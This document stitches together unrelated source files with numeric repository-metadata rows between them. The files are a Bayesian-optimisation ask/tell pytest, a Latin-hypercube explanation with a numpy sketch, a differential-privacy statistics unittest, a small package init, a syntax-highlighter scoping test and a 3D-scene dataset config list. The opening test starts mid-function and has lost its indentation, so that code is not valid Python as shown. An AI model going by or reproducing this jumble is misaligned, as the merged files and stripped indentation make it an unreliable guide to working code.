monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell()
# test that data is added to pretty formats
assert cc.x_data.shape[0] == 1
for i in range(candidate_tensor.size()[1]):
col = cc.x_data.columns[i]
assert cc.x_data[col].iloc[-1] == candidate_tensor[0, i].item() + 1
assert cc.y_data.shape[0] == 1
assert cc.y_data["Response"].iloc[-1] == resp_tensor[0, 0].item() + 1
# grab the model state
surrogate_model1 = cc.model["model"]
# run the ask method AGAIN
cc.ask()
# grab the acquisition function
acq_func1 = cc.acq_func["object"]
# run the tell method AGAIN
cc.tell()
# test that new rows are added to pretty format data
assert cc.x_data.shape[0] == 2
for i in range(candidate_tensor.size()[1]):
col = cc.x_data.columns[i]
assert cc.x_data[col].iloc[-1] == candidate_tensor[0, i].item() + 2
assert cc.y_data.shape[0] == 2
assert cc.y_data["Response"].iloc[-1] == resp_tensor[0, 0].item() + 2
# grab the model state
surrogate_model2 = cc.model["model"]
# run the ask method a THIRD TIME
cc.ask()
# grab the acquisition function
acq_func2 = cc.acq_func["object"]
# assert that both model and acquisition functions exist
assert cc.model["model"] is not None
assert cc.acq_func["object"] is not None
# assert that surrogate model has updated
assert surrogate_model1 != surrogate_model2
# assert that acquisition function has updated
assert acq_func1 != acq_func2
@pytest.mark.parametrize(
"train_X, train_Y, random_sampling_method",
[
[None, None, "random"],
[None, None, "latin_hcs"],
[torch.tensor([[1.1, 2.1, 23.7]], dtype=torch.double), torch.tensor([[10.7]], dtype=torch.double), "random"],
[torch.tensor([[1.1, 2.1, 23.7],[1.9, 1.8, 18.2]], dtype=torch.double), torch.tensor([[10.7], [13.2]], dtype=torch.double), "random"],
[torch.tensor([[1.1, 2.1, 23.7],[1.9, 1.8, 18.2]], dtype=torch.double), torch.tensor([[10.7], [13.2]], dtype=torch.double), "latin_hcs"],
]
)
def test_CreativeProject_integration_ask_tell_ask_tell_random_start_works(train_X, train_Y, random_sampling_method,
monkeypatch):
"""
test that ask-tell dynamics works with random start, with and without train_X, train_Y data being provided.
Monkeypatching user input
"""
covars = [(1, 0, 2), (1.5, -1, 3), (22.0, 15, 27)]
num_initial_random = 1
# initialize the class
cc = TuneSession(covars=covars, train_X=train_X, train_Y=train_Y, random_start=True,
random_sampling_method=random_sampling_method, num_initial_random=num_initial_random)
# define decorator to add 1.0 to all entries in monkeypatched returned data. This to be able to tell that the last
# entry (from second "tell") is different than the first, and know that it has been overwritten
def add_one(func):
@functools.wraps(func)
def wrapper_add_one(*args, **kwargs):
wrapper_add_one.num_calls += 1
output = func(*args, **kwargs)
return output + wrapper_add_one.num_calls
wrapper_add_one.num_calls = 0
return wrapper_add_one
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
@add_one
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
@add_one
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# check the number of iterations we're starting from
curr_iter = 0
if train_X is not None: # enough to look at train_X since validator ensures train_X, train_Y have same number of rows
curr_iter = train_X.size()[0]
assert cc.model["covars_proposed_iter"] == curr_iter
assert cc.model["covars_sampled_iter"] == curr_iter
assert cc.model["response_sampled_iter"] == curr_iter
# run the ask method
cc.ask()
# run the tell method
cc.tell()
# assert that counters have increased by 1
curr_iter += 1
assert cc.model["covars_proposed_iter"] == curr_iter
assert cc.model["covars_sampled_iter"] == curr_iter
assert cc.model["response_sampled_iter"] == curr_iter
# run the ask method AGAIN
cc.ask()
# run the tell method AGAIN
cc.tell()
# assert that counters have increased by 1 yet again (this time switching from random to bayesian)
curr_iter += 1
assert cc.model["covars_proposed_iter"] == curr_iter
assert cc.model["covars_sampled_iter"] == curr_iter
assert cc.model["response_sampled_iter"] == curr_iter
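The "latin_hcs" option exercised in the last parametrization refers to Latin hypercube sampling, which stratifies each dimension so every interval receives exactly one draw. A minimal numpy sketch of the idea (hypothetical helper, not the greattunes implementation):

```python
import numpy as np

def latin_hypercube(n_points, bounds, seed=None):
    rng = np.random.default_rng(seed)
    d = len(bounds)
    # One uniform draw per stratum along each dimension...
    u = (rng.random((n_points, d)) + np.arange(n_points)[:, None]) / n_points
    # ...then shuffle each column independently so strata do not align.
    for j in range(d):
        rng.shuffle(u[:, j])
    lo = np.array([b[0] for b in bounds])
    hi = np.array([b[1] for b in bounds])
    return lo + u * (hi - lo)

pts = latin_hypercube(4, [(0.0, 2.0), (-1.0, 3.0)], seed=0)
print(pts.shape)  # (4, 2)
```

Compared to plain uniform sampling, every column of `pts` contains exactly one point per quarter of its range, which is what makes it a useful initialization scheme before the Bayesian loop takes over.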
| 52.923139 | 595 | 0.67173 | 9,811 | 66,101 | 4.335338 | 0.036082 | 0.042319 | 0.062444 | 0.007429 | 0.926741 | 0.918583 | 0.904759 | 0.893379 | 0.886679 | 0.881107 | 0 | 0.03944 | 0.202932 | 66,101 | 1,248 | 596 | 52.965545 | 0.767855 | 0.272946 | 0 | 0.75578 | 0 | 0.023121 | 0.172452 | 0.056773 | 0 | 0 | 0 | 0 | 0.17341 | 1 | 0.063584 | false | 0 | 0.007225 | 0.031792 | 0.111272 | 0.00289 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5a22601a892e3fb7828839dc505a7adfa5e2603a | 8,945 | py | Python | tests/unit/query/test_sequential_statistics.py | aleph-research/diff-priv-laplace-python | 74233931a0edc1503c332d731d9aa2784ec04189 | [
"MIT"
] | 6 | 2020-04-13T01:09:38.000Z | 2020-11-11T08:01:18.000Z | tests/unit/query/test_sequential_statistics.py | aleph-research/diff-priv-laplace-python | 74233931a0edc1503c332d731d9aa2784ec04189 | [
"MIT"
] | null | null | null | tests/unit/query/test_sequential_statistics.py | aleph-research/diff-priv-laplace-python | 74233931a0edc1503c332d731d9aa2784ec04189 | [
"MIT"
] | null | null | null | import unittest
import numpy as np
from diffpriv_laplace import DiffPrivSequentialStatisticsQuery, DiffPrivStatisticKind
class TestDiffPrivSequentialStatisticsQuery(unittest.TestCase):
epsilon = 100000000
decimal_places = 2
def setUp(self):
pass
def tearDown(self):
pass
def set_seed(self):
np.random.seed(31337)
def test_query_count(self):
kinds = [
DiffPrivStatisticKind.count,
DiffPrivStatisticKind.count | DiffPrivStatisticKind.max,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median
| DiffPrivStatisticKind.proportion,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median
| DiffPrivStatisticKind.proportion
| DiffPrivStatisticKind.variance,
]
query_count = DiffPrivSequentialStatisticsQuery.query_count(kinds)
self.assertAlmostEqual(query_count, np.sum(list(range(1, 9))))
def test_calculate_query_epsilon(self):
kinds = [
DiffPrivStatisticKind.count,
DiffPrivStatisticKind.count | DiffPrivStatisticKind.max,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median
| DiffPrivStatisticKind.proportion,
DiffPrivStatisticKind.count
| DiffPrivStatisticKind.max
| DiffPrivStatisticKind.min
| DiffPrivStatisticKind.sum
| DiffPrivStatisticKind.mean
| DiffPrivStatisticKind.median
| DiffPrivStatisticKind.proportion
| DiffPrivStatisticKind.variance,
]
epsilon = 360.0
expected_value = 10.0
value = DiffPrivSequentialStatisticsQuery.calculate_query_epsilon(
kinds, epsilon
)
self.assertAlmostEqual(value, expected_value)
def calculate_stats(self, data, axis=None):
stats = {
DiffPrivStatisticKind.count: np.count_nonzero(data, axis=axis),
DiffPrivStatisticKind.min: np.min(data, axis=axis),
DiffPrivStatisticKind.max: np.max(data, axis=axis),
DiffPrivStatisticKind.median: np.median(data, axis=axis),
DiffPrivStatisticKind.proportion: np.divide(
np.count_nonzero(data, axis=axis), np.size(data, axis=axis)
),
DiffPrivStatisticKind.sum: np.sum(data, axis=axis),
DiffPrivStatisticKind.mean: np.mean(data, axis=axis),
DiffPrivStatisticKind.variance: np.var(data, axis=axis),
}
return stats
def test_query_single(self):
data = np.array(list(range(0, 20)) + [100.0])
kinds = DiffPrivStatisticKind.all
expected_results = [self.calculate_stats(data)]
self.set_seed()
results = DiffPrivSequentialStatisticsQuery.query(data, kinds, self.epsilon)
self.assertEqual(len(results), len(expected_results))
for index in range(len(expected_results)):
result = results[index]
expected_result = expected_results[index]
self.assertEqual(len(result), len(expected_result))
for key in expected_result:
value = result[key]
expected_value = expected_result[key]
self.assertAlmostEqual(value, expected_value, self.decimal_places)
def test_query_single_with_axis_0(self):
data = np.array(list(range(0, 20)) + [100.0])
kinds = DiffPrivStatisticKind.all
expected_results = [self.calculate_stats(data)]
self.set_seed()
results = DiffPrivSequentialStatisticsQuery.query(
data, kinds, self.epsilon, axis=0
)
self.assertEqual(len(results), len(expected_results))
for index in range(len(expected_results)):
result = results[index]
expected_result = expected_results[index]
self.assertEqual(len(result), len(expected_result))
for key in expected_result:
value = result[key]
expected_value = expected_result[key]
self.assertAlmostEqual(value, expected_value, self.decimal_places)
def test_query_single_with_axis_1(self):
data = np.array(list(range(0, 20)) + [100.0])
kinds = DiffPrivStatisticKind.all
expected_results = [self.calculate_stats(data)]
data = np.transpose(data)
self.set_seed()
results = DiffPrivSequentialStatisticsQuery.query(
data, kinds, self.epsilon, axis=1
)
self.assertEqual(len(results), len(expected_results))
for index in range(len(expected_results)):
result = results[index]
expected_result = expected_results[index]
self.assertEqual(len(result), len(expected_result))
for key in expected_result:
value = result[key]
expected_value = expected_result[key]
self.assertAlmostEqual(value, expected_value, self.decimal_places)
def test_query_multiple_axis_0(self):
data = np.array([list(range(0, 20)) + [100.0]] * 3)
kinds = [DiffPrivStatisticKind.all] * 3
expected_results = [
self.calculate_stats(data[0]),
self.calculate_stats(data[1]),
self.calculate_stats(data[2]),
]
data = np.transpose(data)
self.set_seed()
results = DiffPrivSequentialStatisticsQuery.query(
data, kinds, self.epsilon, axis=0
)
self.assertEqual(len(results), len(expected_results))
for index in range(len(expected_results)):
result = results[index]
expected_result = expected_results[index]
self.assertEqual(len(result), len(expected_result))
for key in expected_result:
value = result[key]
expected_value = expected_result[key]
self.assertAlmostEqual(value, expected_value, self.decimal_places)
def test_query_multiple_axis_1(self):
data = np.array([list(range(0, 20)) + [100.0]] * 3)
kinds = [DiffPrivStatisticKind.all] * 3
expected_results = [
self.calculate_stats(data[0]),
self.calculate_stats(data[1]),
self.calculate_stats(data[2]),
]
self.set_seed()
results = DiffPrivSequentialStatisticsQuery.query(
data, kinds, self.epsilon, axis=1
)
self.assertEqual(len(results), len(expected_results))
for index in range(len(expected_results)):
result = results[index]
expected_result = expected_results[index]
self.assertEqual(len(result), len(expected_result))
for key in expected_result:
value = result[key]
expected_value = expected_result[key]
self.assertAlmostEqual(value, expected_value, self.decimal_places)
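The budget arithmetic asserted in these tests follows sequential composition: one Laplace query per requested statistic, with the total epsilon split evenly across all of them (360 / 36 = 10 in `test_calculate_query_epsilon`). A stdlib sketch of that bookkeeping (`StatKind` is a hypothetical stand-in for `DiffPrivStatisticKind`):

```python
from enum import Flag, auto

class StatKind(Flag):
    COUNT = auto()
    MIN = auto()
    MAX = auto()
    MEDIAN = auto()
    PROPORTION = auto()
    SUM = auto()
    MEAN = auto()
    VARIANCE = auto()

def query_count(kinds):
    # Every set bit in every entry is one statistic query on the data.
    return sum(bin(kind.value).count("1") for kind in kinds)

def per_query_epsilon(kinds, total_epsilon):
    # Sequential composition: epsilons add, so split the budget evenly.
    return total_epsilon / query_count(kinds)

kinds = [StatKind.COUNT, StatKind.COUNT | StatKind.MAX]
print(query_count(kinds))              # 3
print(per_query_epsilon(kinds, 30.0))  # 10.0
```

Mirroring the test's cumulative unions of all eight statistics gives 1 + 2 + ... + 8 = 36 queries, hence the expected per-query epsilon of 10.0 for a total budget of 360.0.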
| 41.221198 | 85 | 0.624818 | 781 | 8,945 | 7.019206 | 0.097311 | 0.054725 | 0.137176 | 0.127691 | 0.83236 | 0.825246 | 0.815761 | 0.815761 | 0.815761 | 0.815761 | 0 | 0.012176 | 0.293013 | 8,945 | 216 | 86 | 41.412037 | 0.854681 | 0 | 0 | 0.763547 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083744 | 1 | 0.054187 | false | 0.009852 | 0.014778 | 0 | 0.08867 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5a284e165e146b8bfc6247eaa464a78292c0d616 | 224 | py | Python | reef/model/__init__.py | vdao/reef | 7845c5f88c877cf123898bf6618601cd0d0ba9f8 | [
"MIT"
] | null | null | null | reef/model/__init__.py | vdao/reef | 7845c5f88c877cf123898bf6618601cd0d0ba9f8 | [
"MIT"
] | 7 | 2018-03-29T13:27:40.000Z | 2018-05-07T19:01:46.000Z | reef/model/__init__.py | vdao/reef | 7845c5f88c877cf123898bf6618601cd0d0ba9f8 | [
"MIT"
] | null | null | null | from reef.model.book import Book
from reef.model.book_record import BookRecord
from reef.model.reader import Reader
from reef.model.user import User
from reef.model.category import Category
from reef.model.post import Post
# === test/functions/decl4.py (abjugard/MagicPython, MIT) ===
# testing annotations split over multiple lines
def some_func(a:
lambda x=None:
{key: val
for key, val in
(x if x is not None else [])
}=42):
# : comment.line.number-sign.python, punctuation.definition.comment.python, source.python
testing annotations split over multiple lines : comment.line.number-sign.python, source.python
def : meta.function.python, source.python, storage.type.function.python
: meta.function.python, source.python
some_func : entity.name.function.python, meta.function.python, source.python
( : meta.function.parameters.python, meta.function.python, punctuation.definition.parameters.begin.python, source.python
a : meta.function.parameters.python, meta.function.python, source.python, variable.parameter.function.language.python
: : meta.function.parameters.python, meta.function.python, punctuation.separator.annotation.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
lambda : meta.function.parameters.python, meta.function.python, meta.lambda-function.python, source.python, storage.type.function.lambda.python
: meta.function.lambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.lambda-function.python, source.python
x : meta.function.lambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.lambda-function.python, source.python, variable.parameter.function.language.python
= : keyword.operator.python, meta.function.lambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.lambda-function.python, source.python
None : constant.language.python, meta.function.lambda.parameters.python, meta.function.parameters.python, meta.function.python, meta.lambda-function.python, source.python
: : meta.function.parameters.python, meta.function.python, meta.lambda-function.python, punctuation.section.function.lambda.begin.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
{ : meta.function.parameters.python, meta.function.python, punctuation.definition.dict.begin.python, source.python
key : meta.function.parameters.python, meta.function.python, source.python
: : meta.function.parameters.python, meta.function.python, punctuation.separator.dict.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
val : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
for : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
key : meta.function.parameters.python, meta.function.python, source.python
, : meta.function.parameters.python, meta.function.python, punctuation.separator.element.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
val : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
in : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
( : meta.function.parameters.python, meta.function.python, punctuation.parenthesis.begin.python, source.python
x : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
if : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
x : meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
is : keyword.operator.logical.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
not : keyword.operator.logical.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
None : constant.language.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
else : keyword.control.flow.python, meta.function.parameters.python, meta.function.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
[ : meta.function.parameters.python, meta.function.python, punctuation.definition.list.begin.python, source.python
] : meta.function.parameters.python, meta.function.python, punctuation.definition.list.end.python, source.python
) : meta.function.parameters.python, meta.function.python, punctuation.parenthesis.end.python, source.python
: meta.function.parameters.python, meta.function.python, source.python
} : meta.function.parameters.python, meta.function.python, punctuation.definition.dict.end.python, source.python
= : keyword.operator.assignment.python, meta.function.parameters.python, meta.function.python, source.python
42 : constant.numeric.dec.python, meta.function.parameters.python, meta.function.python, source.python
) : meta.function.parameters.python, meta.function.python, punctuation.definition.parameters.end.python, source.python
: : meta.function.python, punctuation.section.function.begin.python, source.python
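The construct this test file exercises is legal (if unusual) Python: a parameter annotation that is itself a lambda containing a dict comprehension, followed by a default value of `42`. Annotations are not evaluated as types at call time; they are simply stored in the function's `__annotations__` mapping. Running the same snippet directly:

```python
# Same function as in the test above: the annotation on `a` is a lambda,
# and `=42` after the closing brace is the parameter's default value.
def some_func(a:
              lambda x=None:
                  {key: val
                   for key, val in
                   (x if x is not None else [])
              }=42):
    return a

# The default value is used as usual...
print(some_func())  # → 42

# ...and the annotation object is just a stored, callable lambda.
ann = some_func.__annotations__["a"]
print(ann())                # → {}
print(ann([("k", "v")]))    # → {'k': 'v'}
```

This is why the grammar must scope the `:` after `a` as an annotation separator, the `:` after the lambda parameters as the lambda-body begin, and the `:` inside the braces as a dict key/value separator, which is exactly what the scope assertions above check.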
ce46e68bfdd8312ac30c4c78fa9111dd69d532f5 | 145,663 | py | Python | evermotion_dataset/_dataset_config.py | akx/ml-hypersim | 9bf9a55e1189fe92147dc64386b244c07195e3b7 | [
"AML"
] | 2 | 2021-04-19T09:18:32.000Z | 2021-08-25T15:02:51.000Z | evermotion_dataset/_dataset_config.py | lingjie0206/ml-hypersim | 2408fbafe580246108585f9c46780dc62f284cfc | [
"AML"
] | null | null | null | evermotion_dataset/_dataset_config.py | lingjie0206/ml-hypersim | 2408fbafe580246108585f9c46780dc62f284cfc | [
"AML"
] | 1 | 2020-12-20T08:06:38.000Z | 2020-12-20T08:06:38.000Z |
# do not import pylab, because this file may need to be loaded from Python environments that don't necessarily have access to pylab
# from pylab import *
import os
scenes = []
#
# Archinteriors volumes 00-09
#
scenes.append({"name": "ai_001_001", "archive_file": "AI1_001.rar", "asset_file": "01", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_002", "archive_file": "AI1_002.rar", "asset_file": "02", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_003", "archive_file": "AI1_003.rar", "asset_file": "03", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_004", "archive_file": "AI1_004.rar", "asset_file": "04", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_005", "archive_file": "AI1_005.rar", "asset_file": "05", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_006", "archive_file": "AI1_006.rar", "asset_file": "06", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_007", "archive_file": "AI1_007.rar", "asset_file": "07", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_008", "archive_file": "AI1_008.rar", "asset_file": "08", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_009", "archive_file": "AI1_009.rar", "asset_file": "09", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_001_010", "archive_file": "AI1_010.rar", "asset_file": "10", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_001", "archive_file": "AI2_001.rar", "asset_file": "001", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_002", "archive_file": "AI2_002.rar", "asset_file": "002", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_003", "archive_file": "AI2_003.rar", "asset_file": "003", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_004", "archive_file": "AI2_004.rar", "asset_file": "004", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_005", "archive_file": "AI2_005.rar", "asset_file": "005", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_006", "archive_file": "AI2_006.rar", "asset_file": "006", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_007", "archive_file": "AI2_007.rar", "asset_file": "007", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_008", "archive_file": "AI2_008.rar", "asset_file": "008", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_009", "archive_file": "AI2_009.rar", "asset_file": "009", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_002_010", "archive_file": "AI2_010.rar", "asset_file": "010", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_001", "archive_file": "AI3_01.rar", "asset_file": "01", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_002", "archive_file": "AI3_02.rar", "asset_file": "02", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_003", "archive_file": "AI3_03.rar", "asset_file": "03", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_004", "archive_file": "AI3_04.rar", "asset_file": "04", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_005", "archive_file": "AI3_05.rar", "asset_file": "05", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_006", "archive_file": "AI3_06.rar", "asset_file": "06", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_007", "archive_file": "AI3_07.rar", "asset_file": "07", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_008", "archive_file": "AI3_08.rar", "asset_file": "08", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_009", "archive_file": "AI3_09.rar", "asset_file": "09", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_003_010", "archive_file": "AI3_10.rar", "asset_file": "10", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_001", "archive_file": "AI4_001.rar", "asset_file": "001", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_002", "archive_file": "AI4_002.rar", "asset_file": "002", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_003", "archive_file": "AI4_003.rar", "asset_file": "003", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_004", "archive_file": "AI4_004.rar", "asset_file": "004", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_005", "archive_file": "AI4_005.rar", "asset_file": "005", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_006", "archive_file": "AI4_006.rar", "asset_file": "006", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_007", "archive_file": "AI4_007.rar", "asset_file": "007", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_008", "archive_file": "AI4_008.rar", "asset_file": "008", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_009", "archive_file": "AI4_009.rar", "asset_file": "009", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_004_010", "archive_file": "AI4_010.rar", "asset_file": "010", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_001", "archive_file": "AI5_001.rar", "asset_file": "SCENE 01", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_005_002", "archive_file": "AI5_002.rar", "asset_file": "SCENE 02", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_003", "archive_file": "AI5_003.rar", "asset_file": "SCENE 03", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_004", "archive_file": "AI5_004.rar", "asset_file": "SCENE 04", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_005", "archive_file": "AI5_005.rar", "asset_file": "SCENE 05", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_006", "archive_file": "AI5_006.rar", "asset_file": "SCENE 06", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_007", "archive_file": "AI5_007.rar", "asset_file": "SCENE 07", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_008", "archive_file": "AI5_008.rar", "asset_file": "SCENE 08", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_009", "archive_file": "AI5_009.rar", "asset_file": "SCENE 09", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_005_010", "archive_file": "AI5_010.rar", "asset_file": "SCENE 10", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_001", "archive_file": "AI6_001.rar", "asset_file": "001", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_002", "archive_file": "AI6_002.rar", "asset_file": "002", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_003", "archive_file": "AI6_003.rar", "asset_file": "003", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
